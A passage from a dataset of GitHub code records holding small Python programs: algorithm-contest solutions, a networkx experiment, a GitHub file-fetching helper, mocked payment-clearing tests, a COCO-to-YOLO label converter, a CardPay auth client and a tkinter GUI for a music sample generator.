profit+=amount*L[i]\n if i+1==n:break\n sellingday=find_max(i+1)\n amount=0\n else:\n amount+=1\n profit-=L[i]\n print(profit)\n\n\n'''\n1\n11\n2 6 8 7 6 5 1 2 3 4 5\n'''","repo_name":"JannaKim/PS","sub_path":"dp/11501_주식.py","file_name":"11501_주식.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21801561516","text":"import networkx as nx\n\ngraph = nx.MultiDiGraph()\n\n# class node(object):\n\n # def __init__(self, num):\n # self.num = num\n\n# class edge(object):\n\n # def __init__(self, type, value):\n # self.type = type\n # self.value = value\n\n# n1 = node(1)\n# graph.add_node(n1)\n# e1 = edge('c', 10)\n# n2 = node(2)\n# graph.add_node(n2)\n# graph.add_edge(n1, n2, object=e1) # is the way you added an edge object correct\n# e2 = edge('r', 6)\n# graph.add_edge(n1, n2, object=e2)\n\ngraph.add_node(1)\ngraph.add_node(2)\ngraph.add_edge(1, 2, key=0, type='c', value=10)\ngraph.add_edge(1, 2, key=1, type='r', value=6)\n\nl = graph.get_edge_data(1,2,0)\nz = l['value']\na = graph.edges()\none = a[1]\nprint('Nodes are', one[0], 'and', one[1])\nprint(graph.edge)\ngraph.add_edge(3, 4, key=1, type='c', value=10)\nprint(graph.edge)\nprint(graph.node)\n\n\n\n#print(graph.number_of_edges())\n#print(graph.number_of_nodes())\n\n#a = list(graph.nodes())\n#for node in a:\n # print(node)\n\n","repo_name":"krishnakpatel/Summer2017","sub_path":"graphv3.py","file_name":"graphv3.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25396929350","text":"# var1\n# text = list(map(str, input().split((\" \"))))\n\n# var 2\n# file_object = open(\"week3/test_file.txt\")\n# file_object = sys.stdin\n# lines = file_object.read()\n# text = lines.split()\n\n# var 3\nimport sys\n\nlines = sys.stdin.read()\ntext = lines.split()\n\ncount_dict = {}\nresult = []\nfor world in text:\n num_prev = count_dict.get(world, 0)\n result.append(str(num_prev))\n if num_prev == 0:\n count_dict[world] = 1\n else:\n count_dict[world] += 1\n\nprint(\" \".join(result))\n","repo_name":"Kristobal-Khunta/Algorithms","sub_path":"yandex_algo_course/week4/taskB.py","file_name":"taskB.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70741836714","text":"class UnionFind():\n def __init__(self, n):\n self.n = n\n self.root = [-1] * n\n self.rank = [0] * n\n\n def find(self, x):\n if(self.root[x] < 0):\n return x\n else:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n\n def unite(self, x, y):\n x = self.find(x)\n y = self.find(y)\n if(x == y):\n return\n elif(self.rank[x] > self.rank[y]):\n self.root[x] += self.root[y]\n self.root[y] = x\n else:\n self.root[y] += self.root[x]\n self.root[x] = y\n if(self.rank[x] == self.rank[y]):\n self.rank[y] += 1\n\n def roots(self):\n return [i for i, x in enumerate(self.root) if x < 0]\n\n def group_size(self):\n return len(self.roots())\n\n\nn, m = map(int, input().split())\nabl = [list(map(int, input().split())) for _ in range(m)]\n\nans = 0\nfor i in range(m):\n uf = UnionFind(n)\n for j in range(m):\n if j == i:\n continue\n a, b = abl[j]\n uf.unite(a - 1, b - 1)\n if uf.group_size() > 1:\n ans += 1\nprint(ans)","repo_name":"ymsk-sky/atcoder_part3","sub_path":"to_skyblue/086_abc075c_Bridge.py","file_name":"086_abc075c_Bridge.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15148833659","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport copy\r\n\r\ninput = sys.stdin.readline\r\n\r\n# ---------------------------------------------------------\r\n\r\nfrom collections import Counter\r\n\r\nN, M = map(int, input().split())\r\nname = input().rstrip()\r\nkit = input().rstrip()\r\n\r\nname_cnt = Counter(name)\r\nkit_cnt = Counter(kit)\r\n\r\nfor key, val in name_cnt.items():\r\n if kit_cnt[key] == 0:\r\n print(-1)\r\n exit()\r\n\r\nans = 0\r\nfor key, val in name_cnt.items():\r\n d = kit_cnt[key]\r\n ans = max(ans, (val + d - 1) // d)\r\n\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc008/B/4921412.py","file_name":"4921412.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"6231655996","text":"from get_github_code.constants import API_URL\nfrom get_github_code.decode import Decode\nfrom get_github_code.exceptions import GetCodeException\nfrom get_github_code.json import JSON\nfrom get_github_code.request import Request\n\n\nclass GetCode(Request, JSON, Decode):\n \"\"\"### GetCode class\n\n Args:\n `user (str)`: GitHub Username\n\n `repo (str)`: GitHub repository name\n\n `branch (str)`: Github repository branch\n\n `file_path (str)`: File path in repository\n\n functions:\n `(property) get_code -> str:`\n Return github code from file_path\n\n `(property) async_get_code -> str:`\n Asynchronous return github code from file_path\n \"\"\"\n def __init__(\n self,\n user: str,\n repo: str,\n branch: str,\n file_path: str,\n ) -> None:\n self.user: str = user\n self.repo: str = repo\n self.branch: str = branch\n self.file: str = file_path\n self.url: str = API_URL.format(self.user, self.repo,\n self.file, self.branch)\n\n @property\n def get_code(self) -> str:\n \"\"\"Return github code from file_path\"\"\"\n\n response = self.request(url=self.url)\n if not response.status == 200:\n raise GetCodeException(\"Connection refused\")\n return self.loads(data=response._body.decode(\"utf-8\"))[\"content\"]\n\n @property\n async def async_get_code(self) -> str:\n \"\"\"Asynchronous return github code from file_path\"\"\"\n\n response = await self.async_request(url=self.url)\n if not response.status == 200:\n raise GetCodeException(\"Connection refused\")\n json = self.loads(data=response)[\"content\"]\n return self.b64(data=json)\n\n\ndef get_code(\n user: str,\n repo: str,\n file_path: str,\n branch: str = \"main\",\n) -> str:\n \"\"\"Get github code from repository\n\n Args:\n `user (str)`: GitHub Username\n\n `repo (str)`: GitHub repository name\n\n `branch (str)`: Github repository branch. Defaults to `\"main\"`\n\n `file_path (str)`: File path in repository\n\n Returns:\n str: Code from github repository\n \"\"\"\n return GetCode(user, repo, branch, file_path).get_code\n\n\nasync def async_get_code(\n user: str,\n repo: str,\n file_path: str,\n branch: str = \"main\",\n) -> str:\n \"\"\"Asynchronous get github code from repository\n\n Args:\n `user (str)`: GitHub Username\n\n `repo (str)`: GitHub repository name\n\n `branch (str)`: Github repository branch. Defaults to `\"main\"`\n\n `file_path (str)`: File path in repository\n\n Returns:\n str: Code from github repository\n \"\"\"\n return await GetCode(user, repo, branch, file_path).async_get_code\n","repo_name":"Vlad2030/get-code-from-github","sub_path":"get_github_code/get_code/get_code.py","file_name":"get_code.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"467260199","text":"# coding: utf8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nfrom datetime import datetime\n\nimport mock\nimport pytest\n\nimport travel.rasp.train_api.train_purchase.workflow.payment.clear_payment\nfrom common.data_api.billing.trust_client import TrustClientRequestError, TrustPaymentInfo, TrustPaymentStatuses\nfrom common.workflow.tests_utils.process import process_state_action\nfrom travel.rasp.train_api.train_purchase.core.enums import OrderStatus\nfrom travel.rasp.train_api.train_purchase.core.factories import TrainOrderFactory, RefundPaymentFactory\nfrom travel.rasp.train_api.train_purchase.core.models import RefundPaymentStatus\nfrom travel.rasp.train_api.train_purchase.workflow.payment import ClearPaymentEvents, ClearPayment\n\npytestmark = [pytest.mark.mongouser('module'), pytest.mark.dbuser('module')]\n\n\ndef _process(payment):\n return process_state_action(ClearPayment, (ClearPaymentEvents.OK,), payment)\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment.TrustClient, 'clear_payment', autospec=True)\ndef test_clear_payment_ok(m_clear_payment):\n side_effects = [TrustClientRequestError('a_few_of_request_errors #%d' % i) for i in range(2)]\n side_effects.append(None)\n m_clear_payment.side_effect = side_effects\n\n original_order = TrainOrderFactory(status=OrderStatus.RESERVED,\n payments=[dict(purchase_token='some_purchase_token')])\n event, payment = _process(original_order.current_billing_payment)\n\n assert m_clear_payment.call_count == len(side_effects)\n assert event == ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment.TrustClient, 'clear_payment', autospec=True)\ndef test_clear_payment_retries_exceeded(m_clear_payment):\n side_effects = [TrustClientRequestError('a_lot_of_request_errors #%d' % i) for i in range(5)]\n m_clear_payment.side_effect = side_effects\n\n original_order = TrainOrderFactory(status=OrderStatus.RESERVED,\n payments=[dict(purchase_token='some_purchase_token')])\n event, payment = _process(original_order.current_billing_payment)\n\n assert m_clear_payment.call_count == len(side_effects)\n assert event != ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment.TrustClient, 'clear_payment', autospec=True)\ndef test_clear_payment_fail(m_clear_payment):\n m_clear_payment.side_effect = [Exception('another_error')]\n\n original_order = TrainOrderFactory(status=OrderStatus.RESERVED,\n payments=[dict(purchase_token='some_purchase_token')])\n event, payment = _process(original_order.current_billing_payment)\n\n assert m_clear_payment.call_count == 1\n assert event != ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment, 'TrustClient', autospec=True)\ndef test_clear_payment_no_need_to_clear(m_trust_client):\n original_order = TrainOrderFactory(\n status=OrderStatus.RESERVED,\n payments=[{'purchase_token': 'some_purchase_token', 'immediate_return': True}]\n )\n event, payment = _process(original_order.current_billing_payment)\n assert not m_trust_client.called\n assert event == ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment, 'TrustClient', autospec=True)\ndef test_clear_after_resize(m_trust_client):\n m_trust_client.return_value.get_payment_info.return_value = TrustPaymentInfo({\n 'payment_status': TrustPaymentStatuses.CLEARED,\n 'reversal_id': '123123123'\n })\n purchase_token = 'some_purchase_token'\n\n refund_payment = RefundPaymentFactory(\n factory_extra_params={'create_order': True}, purchase_token=purchase_token, payment_resized=True\n )\n payment = refund_payment.payment\n payment.current_refund_payment_id = refund_payment.id\n payment.save()\n event, payment = _process(payment)\n refund_payment.reload()\n\n m_trust_client.return_value.clear_payment.assert_called_once_with(purchase_token)\n m_trust_client.return_value.get_payment_info.assert_called_once_with(purchase_token)\n assert event == ClearPaymentEvents.OK\n assert refund_payment.refund_payment_status == RefundPaymentStatus.DONE\n assert refund_payment.trust_reversal_id == '123123123'\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment, 'TrustClient', autospec=True)\ndef test_skip_cleared(m_trust_client):\n original_order = TrainOrderFactory(\n status=OrderStatus.RESERVED,\n payments=[dict(\n purchase_token='some_purchase_token',\n clear_at=datetime(2018, 10, 9)\n )]\n )\n event, payment = _process(original_order.current_billing_payment)\n\n assert not m_trust_client.called\n assert event == ClearPaymentEvents.OK\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/train_purchase/workflow/payment/test_clear_payment.py","file_name":"test_clear_payment.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8735133996","text":"#problem 547 / friend circles\n##dfs\nclass Solution(object):\n def findCircleNum(self, M):\n \"\"\"\n :type M: List[List[int]]\n :rtype: int\n \"\"\"\n n = len(M)\n visited = [0]*n\n count = 0\n def dfs(i):\n for j in range(n):\n if M[i][j] == 1 and visited[j] == 0:\n visited[j] = 1\n dfs(j)\n for i in range(n):\n if visited[i] == 0:\n dfs(i)\n count += 1\n return count\n\n##bfs\nclass Solution(object):\n def findCircleNum(self, M):\n \"\"\"\n :type M: List[List[int]]\n :rtype: int\n \"\"\"\n queue = collections.deque()\n count = 0\n n = len(M)\n visited = [0]*n\n for i in range(n):\n if visited[i] == 0:\n queue.append(i)\n while queue:\n s = queue.popleft()\n visited[s] = 1\n for j in range(n):\n if M[s][j] == 1 and visited[j] == 0:\n queue.append(j)\n count += 1\n return count","repo_name":"digitalladder/leetcode","sub_path":"problem547.py","file_name":"problem547.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39969498622","text":"'''\r\nJSON (JavaScript Object Notation)\r\n'''\r\n\r\nimport json\r\nimport os\r\n\r\n# folder_path_json = \"C:/Users/user/Desktop/fileload\" #json file load path\r\n# folder_path_txt = \"C:/Users/user/Desktop/fileload\" #txt파일 save path\r\n\r\n#yongwoo's folder path\r\nfolder_path_json = \"C:/Users/PC/Desktop/fileload/lable_json_streetlamp\" #json file load path\r\nfolder_path_txt = \"C:/Users/PC/Desktop/fileload/lable_txt_streetlamp\" #txt파일 save path\r\n\r\n\r\n#디코딩(해석, 역직렬화): json:loads()\r\n\r\n#path에 해당하는 파일을 yolo형식으로 바꿔주는 함수\r\n# list를 return함 ==> output.append([id, x, y, w, h])\r\ndef CocoJsonToYoloFormat(path) :\r\n with open(path,'r', encoding='UTF-8') as f : \r\n #path에 해당하는 json파일을 읽기모드로 json파일을 연후에 f라는 이름으로 읽어오기 \r\n json_data = json.load(f) #json_data에 python 객체로 읽어와서 디코딩 \r\n\r\n # print(json.dumps(json_data, indent=\"\\t\"))\r\n\r\n images = json_data['images'][0] \r\n width = images['width'] #image class에서 width\r\n height = images['height'] #image class에서 height\r\n\r\n annotations = json_data['annotations']\r\n output = []\r\n for i in range(len(annotations)) :# annotations class객체에 길이만큼 (2개)\r\n annotation = annotations[i]\r\n #id = annotation['id'] #annotations class에서 id\r\n id = 0 # 정상은 객체인식 0만\r\n bbox = annotation['bbox'] #annotations class에서 bbox\r\n\r\n x = (bbox[0]+(bbox[2]/2)) / width # rate of x\r\n y = (bbox[1]+(bbox[3]/2)) / height # rate of y\r\n w = bbox[2] / width # rate of width\r\n h = bbox[3] / height # rate of height\r\n\r\n output.append([id, x, y, w, h])\r\n return output\r\n\r\ndef saveYoloToTxt(file_name, save_data):#파일이름과, list형식으로 저장된 yolo파일들 \r\n\r\n #file_name에 해당하는 yolo파일을 쓰기모드로 쓰는데 f_txt라는 이름으로 쓰기모드\r\n with open(file_name, 'w', encoding='UTF-8') as f_txt :\r\n for i in range(len(save_data)):# save_data에 길이만큼 반복\r\n save_yoloform = save_data[i] # save_yoloform에 save_data순서대로 넣기 \r\n f_txt.write('%g %.6f %.6f %.6f %.6f' %(save_yoloform[0],save_yoloform[1],save_yoloform[2],save_yoloform[3],save_yoloform[4])) #순서대로 기입\r\n if(i != len(save_data)-1) :\r\n f_txt.write('\\n')\r\n\r\nfileEx = r'.json' #출력하면 .json 으로나오는데 r왜붙힌지 모르겠음\r\nfile_name_list = [file for file in os.listdir(folder_path_json) if file.endswith(fileEx)] # .json으로 접미사가 되어있는 file들만 list로만들어서 file_name_list에 저장 ==> endswith(.json)\r\n'''\r\nendswith\r\n정의된 문자열이 지정된 접미사로 끝나면 True를 return \r\n정의된 문자열의 접미사로 끝나지않으면 False를 return\r\n\r\nos.sep\r\n OS 에 상관없이 디렉토리 구분자 역할함.\r\n'''\r\n\r\nnum_json = len(file_name_list) # file_name_list리스트의 길이 재기 (json파일의 갯수)\r\n\r\nfor index_json in range(num_json) : #json파일의 갯수만큼 반복\r\n file_name = file_name_list[index_json] \r\n path_json = folder_path_json + os.sep + file_name # 경로지정 \r\n # Load\r\n yolo_data = CocoJsonToYoloFormat(path_json)\r\n\r\n # Save\r\n path_txt = folder_path_txt + os.sep + file_name[0:-4]+'txt' #file_name[0:-4] == json ==> 확장자명 바꾸기\r\n saveYoloToTxt(path_txt,yolo_data)\r\n\r\n print(\"process : %d / %d (%d %%) [file : \"%(index_json+1,num_json,(index_json+1)*100/num_json)+file_name+\"\\n\" )","repo_name":"softwareyong/kt_al_road_facility_maintenance","sub_path":"JsonToTxt.py","file_name":"JsonToTxt.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11286141699","text":"# Given's way\n\nprint(\"Activity - 17 (derek banas test)\")\n\n\n# Instructions\n# Create a program that prints out the fibonacci numbers\n# Of a passed in argument\n\n# Hints\n# Fn = Fn-1 + Fn-2\n# If Fn = 0 and Fn = 1\n# Return them else continue\n\ndef fib(num):\n if num == 0:\n return 0\n elif num == 1:\n return 1\n else:\n result = fib(num - 1) + fib(num - 2)\n return result\n\n\nprint(fib(5))\nprint(fib(6))\nprint(fib(7))\nnumFib = int(input(\"How many fibonacci numbers to display: \"))\ni = 0\nwhile i < numFib:\n fibvalue = fib(i)\n print(fibvalue)\n i += 1\n\nprint(\"All done\")\n","repo_name":"GhettoCole/Python3-","sub_path":"Advanced/Fibonacci numbers.py","file_name":"Fibonacci numbers.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29125769774","text":"# coding: utf-8\n\n\"\"\"\n CardPay REST API\n\n Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a [REST](https://en.wikipedia.org/wiki/Representational_state_transfer) resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on [OAuth 2.0](https://oauth.net/2/) standard. For recent changes see changelog section. # noqa: E501\n\n OpenAPI spec version: 3.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport re # noqa: F401\n\n# python 2 and python 3 compatibility library\nimport six\n\nfrom cardpay.api_client import ApiClient\n\n\nclass AuthApi(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n Ref: https://github.com/swagger-api/swagger-codegen\n \"\"\"\n\n def __init__(self, api_client=None):\n if api_client is None:\n api_client = ApiClient()\n self.api_client = api_client\n\n def obtain_tokens(self, grant_type, **kwargs): # noqa: E501\n \"\"\"Get authorization token # noqa: E501\n\n :param str grant_type: Token request credentials representation (required)\n :param str password: Terminal password value (only for [password] grant type)\n :param str refresh_token: Refresh token string (only for [refresh_token] grant type)\n :param str terminal_code: Terminal code value\n :return: ApiTokens\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs[\"_return_http_data_only\"] = True\n\n (data) = self.obtain_tokens_with_http_info(grant_type, **kwargs) # noqa: E501\n return data\n\n def obtain_tokens_with_http_info(self, grant_type, **kwargs): # noqa: E501\n \"\"\"Get authorization token # noqa: E501\n\n :param str grant_type: Token request credentials representation (required)\n :param str password: Terminal password value (only for [password] grant type)\n :param str refresh_token: Refresh token string (only for [refresh_token] grant type)\n :param str terminal_code: Terminal code value\n :return: ApiTokens\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = [\n \"grant_type\",\n \"password\",\n \"refresh_token\",\n \"terminal_code\",\n ] # noqa: E501\n all_params.append(\"_return_http_data_only\")\n all_params.append(\"_preload_content\")\n all_params.append(\"_request_timeout\")\n\n params = locals()\n for key, val in six.iteritems(params[\"kwargs\"]):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method obtain_tokens\" % key\n )\n params[key] = val\n del params[\"kwargs\"]\n # verify the required parameter 'grant_type' is set\n if \"grant_type\" not in params or params[\"grant_type\"] is None:\n raise ValueError(\n \"Missing the required parameter `grant_type` when calling `obtain_tokens`\"\n ) # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n\n query_params = []\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n if \"grant_type\" in params:\n form_params.append((\"grant_type\", params[\"grant_type\"])) # noqa: E501\n if \"password\" in params:\n form_params.append((\"password\", params[\"password\"])) # noqa: E501\n if \"refresh_token\" in params:\n form_params.append((\"refresh_token\", params[\"refresh_token\"])) # noqa: E501\n if \"terminal_code\" in params:\n form_params.append((\"terminal_code\", params[\"terminal_code\"])) # noqa: E501\n\n body_params = None\n # HTTP header `Accept`\n header_params[\"Accept\"] = self.api_client.select_header_accept(\n [\"application/json\"]\n ) # noqa: E501\n # HTTP header `Content-Type`\n header_params[\n \"Content-Type\"\n ] = self.api_client.select_header_content_type( # noqa: E501\n [\"application/x-www-form-urlencoded\"]\n ) # noqa: E501\n\n return self.api_client.call_api(\n \"/api/auth/token\",\n \"POST\",\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type=\"ApiTokens\", # noqa: E501\n _return_http_data_only=params.get(\"_return_http_data_only\"),\n _preload_content=params.get(\"_preload_content\", True),\n _request_timeout=params.get(\"_request_timeout\"),\n collection_formats=collection_formats,\n )\n","repo_name":"cardpay/python-sdk-v3","sub_path":"cardpay/api/auth_api.py","file_name":"auth_api.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"29865775329","text":"import random\nrounds=int(input(\"how many rounds you want to play ? :\"))\nscore=0\nfor i in range(rounds):\n user_input=input(\" press 'r' for rock,'p' for paper,'s' for scissor\\n your choice : \")\n if user_input ==\"r\" or user_input ==\"p\" or user_input ==\"s\" :\n\n elements=[\"r\",\"p\",\"s\"]\n comp=random.choice(elements)\n else: \n print(\"invalid input\")\n break\n if user_input==comp: \n print(\"comp chose :\",comp)\n print(\"draw\")\n elif (user_input==\"r\" and comp==\"p\") or (user_input==\"p\" and comp==\"s\") or (user_input==\"s\" and comp==\"r\") : \n print(\"comp chose :\",comp)\n print(\"comp won \")\n \n else: \n print(\"comp chose :\",comp)\n print(\"you won \")\n score+=1\nif (score==rounds/2): \n print(\"Its a Draw with a score of \",score) \nelif (score>=rounds/2):\n print(\"you won with a score of \",score)\nelse:\n print(\"you lost with a score of score\",score)","repo_name":"Alonewolf2004/smartquizwithlifeline","sub_path":"rockpaper.py","file_name":"rockpaper.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18716567204","text":"\"\"\"\nCreated on Wed Aug 3 13:36:40 2022\n\n@author: João Paixão\n@email: joao.p.paixao@tecnico.ulisboa.pt\n\n@brief: Graphical User Interface\n\"\"\"\n\n\nimport tkinter as tk \nfrom tkinter import font as tkfont \nimport threading\n\nfrom PIL import ImageTk, Image\n\nimport os\nimport sys\n\n#so that pygame doesn't print anything\ndevnull = open(os.devnull, 'w')\nsys.stdout = devnull\nimport pygame\nsys.stdout = sys.__stdout__\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\n\nimport warnings\n\nclass App(tk.Tk):\n\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n self.shared_data = {\n \"main_path\": os.getcwd().replace('\\\\','/'),\n \"bpm\": tk.IntVar(),\n 'train' : tk.BooleanVar(),\n 'mod': tk.DoubleVar(),\n 'fb': tk.IntVar(),\n 'section_size': tk.IntVar()}\n\n \n self.title_font = tkfont.Font(family='Helvetica', size=38,\n weight=\"bold\", slant=\"italic\")\n\n # the container is where we'll stack a bunch of frames\n # on top of each other, then the one we want visible\n # will be raised above the others\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n #container.grid(row=0, column=3, sticky=\"nsew\")\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(2, weight=2)\n\n\n self.frames = {}\n for F in (StartPage, PageOne, PageOne2, PageTwo, PageThree, PageFour,\n PageFive, PageSix, PageSeven, PageEight, PageNine, PageTen,\n \n INFO_MOD_LEVEL, INFO_SECTION_SIZE, INFO_MOD_FEEDBACK,\n INFO_CUSTOMIZE_PARAMETERS, INFO_CUTOFF, INFO_LFO, \n INFO_LFO_SHAPE_EVO, INFO_GRAIN_SIZE, INFO_GRAIN_SPACE,\n INFO_GRAIN_ORDER, INFO_SMOOTHING, INFO_EVEN_SPACING,\n INFO_SIGNAL_SHAPE_EVO):\n \n page_name = F.__name__\n frame = F(parent=container, controller=self)\n self.frames[page_name] = frame\n\n # put all of the pages in the same location;\n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=2, sticky=\"nsew\")\n \n #frame.pack(side=\"top\", fill=\"both\", expand=True)\n #frame.grid_rowconfigure(0, weight=1)\n #frame.grid_columnconfigure(0, weight=1)\n\n self.show_frame(\"StartPage\")\n\n def show_frame(self, page_name):\n '''Show a frame for the given page name'''\n frame = self.frames[page_name]\n frame.tkraise()\n\n\nclass StartPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n controller.title(\"dubgen\")\n controller.geometry(\"700x500\")\n controller.config(bg=\"blue\") \n \n label = tk.Label(self, text=\"dubgen\", font=controller.title_font, fg=\"#1c4966\")\n #label.pack(side=\"top\", fill=\"x\", pady=10)\n label.pack(fill=\"both\", expand=True)\n \n slogan = tk.Label(self, text=\"Sampler and MIDI Arrangement Generator\",\n font=('Helvetica', 18))\n slogan.pack( expand=True)\n\n button1 = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageOne\"))\n\n button1.pack( expand=True)\n\n\nclass PageOne(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n row=0\n\n label = tk.Label(self, text=\"How it works:\", font=controller.title_font)\n label.pack(side=\"top\", pady=10)\n row+=1\n \n text1=\"dubgen creates monophonic samples from given sounds, modifies MIDI compositions, and then choses a sequence of samples to generate an arrangement (new MIDI + samples)\"\n text2 = 'Created samples can also be modulated by a Synthesizer' \n\n explanation1 = tk.Label(self, text=text1,\n font=('Helvetica', 18, 'bold'), wraplength=500)\n explanation1.pack(expand=True)\n row+=1\n \n \n explanation2 = tk.Label(self, text=text2,\n font=('Helvetica', 18, 'bold'), wraplength=500)\n explanation2.pack(expand=True)\n row+=1\n\n\n button = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageOne2\"))\n button.pack(expand=True, side='right', pady=20)\n row+=1\n\nclass PageOne2(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n row=0\n\n label = tk.Label(self, text=\"How it works:\", font=controller.title_font)\n label.pack(side=\"top\", pady=10)\n row+=1\n \n text1=\"Your input:\"\n text1_1='(Go to \".../dubgen_APP/user\" folder)'\n text2=\"1. Folders with sounds for three instruments (Bass, Harmony and Melody);\\n\"\n text2_2=\"2. Three MIDI files, one for each instrument.\"\n text3=\"dubgen's Output:\"\n text4=\"1. Folder with created samples;\\n\"\n text4_2=\"2. Three new MIDI files, one for each instrument;\\n\"\n text4_3='3. Wav and mp3 files of the generated Arrangement (with or without Synthesizer Processing).\\n'\n\n explanation1 = tk.Label(self, text=text1,\n font=('Helvetica', 18, 'bold'))#, justify=\"left\", wraplength=500)\n explanation1.pack(expand=True)\n row+=1\n \n explanation1_1 = tk.Label(self, text=text1_1,\n font=('Helvetica', 10, 'bold',\"italic\"), fg=\"#1c4966\")#, justify=\"left\", wraplength=500)\n explanation1_1.pack(expand=True)\n row+=1\n\n\n text_box = tk.Text(self)\n text_box.insert('end', text2)\n text_box.insert('end', text2_2)\n text_box.pack(expand=True)\n text_box.configure(state='disabled', height=5, width=50)\n row+=1\n \n explanation2 = tk.Label(self, text=text3,\n font=('Helvetica', 18, 'bold'))\n explanation2.pack(expand=True)\n row+=1\n\n text_box2 = tk.Text(self)\n text_box2.insert('end', text4)\n text_box2.insert('end', text4_2)\n text_box2.insert('end', text4_3)\n text_box2.pack(expand=True)\n text_box2.configure(state='disabled', height=5, width=50)\n row+=1\n\n button = tk.Button(self, text=\"Next\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, side='right', pady=20)\n row+=1\n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command= lambda: controller.show_frame(\"PageOne\"))\n button.pack(expand=True, side='right', pady=20, padx=20)\n row+=1\n \n \n# funcs parameter will have the reference\n# of all the functions that are \n# passed as arguments i.e \"fun1\" and \"fun2\"\ndef combine_funcs(*funcs):\n \n # this function will call the passed functions\n # with the arguments that are passed to the functions\n def inner_combined_func(*args, **kwargs):\n for f in funcs:\n \n # Calling functions with arguments, if any\n f(*args, **kwargs)\n \n # returning the reference of inner_combined_func\n # this reference will have the called result of all\n # the functions that are passed to the combined_funcs\n return inner_combined_func\n\nclass user_input:\n def __init__(self, bpm, main_path, mod, fb, section_size):\n self.bpm = bpm\n self.main_path = main_path\n self.mod = mod\n self.fb = fb\n self.section_size = section_size\n\n\nclass PageTwo(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(5):\n if i!=2:\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n row = 1\n \n \n label = tk.Label(self, 